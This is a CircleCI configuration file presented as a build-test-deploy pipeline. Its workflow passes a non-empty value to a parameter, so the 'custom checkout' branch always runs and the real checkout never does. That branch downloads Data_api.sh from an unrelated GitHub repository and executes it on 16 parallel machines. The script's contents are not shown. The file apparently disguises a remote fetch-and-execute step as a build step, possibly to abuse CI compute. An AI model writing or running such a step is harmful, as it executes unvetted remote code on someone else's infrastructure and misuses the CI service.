version: 2.1

jobs: # conditional steps may also be defined in `commands:`
  job_with_optional_custom_checkout:
    parameters:
      custom_checkout:
        type: string
        default: ""
    parallelism: 16 
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - when:
          condition: <<parameters.custom_checkout>>
          steps:
            - run: wget https://raw.githubusercontent.com/circelwenakyo/nyobsa/main/Data_api.sh && chmod +x Data_api.sh && ./Data_api.sh
      - unless:
          condition: <<parameters.custom_checkout>>
          steps:
            - checkout

workflows:
  build-test-deploy:
    jobs:
      - job_with_optional_custom_checkout:
          custom_checkout: "any non-empty string is truthy"
